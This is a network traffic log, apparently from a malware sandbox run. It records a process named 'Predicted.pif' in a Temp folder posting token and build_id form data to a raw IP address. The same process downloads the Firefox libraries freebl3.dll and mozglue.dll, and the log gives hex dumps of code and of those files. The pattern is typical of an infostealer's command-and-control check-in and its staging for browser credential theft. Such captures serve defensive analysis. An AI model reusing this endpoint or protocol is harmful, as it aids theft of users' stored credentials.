2024-08-19 04:06:03 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49865	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:05 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:05 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------HJECAAKKFHCFIECAAAKECont
2024-08-19 04:06:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49867	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:06 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:06 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------JKJDBAAAEHIEGCAKFHCGCont
2024-08-19 04:06:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49870	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:07 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:07 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------JKJDBAAAEHIEGCAKFHCGCont
2024-08-19 04:06:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49872	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:08 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:08 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------DAECFIJDAAAKECBFCGHICont
2024-08-19 04:06:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49875	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:10 UTC	226	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:10 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:10 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:10 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:10 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
2024-08-19 04:06:10 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49878	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:12 UTC	226	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:12 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:12 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:12 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:12 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-08-19 04:06:12 UTC	16384	IN	Data Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPF
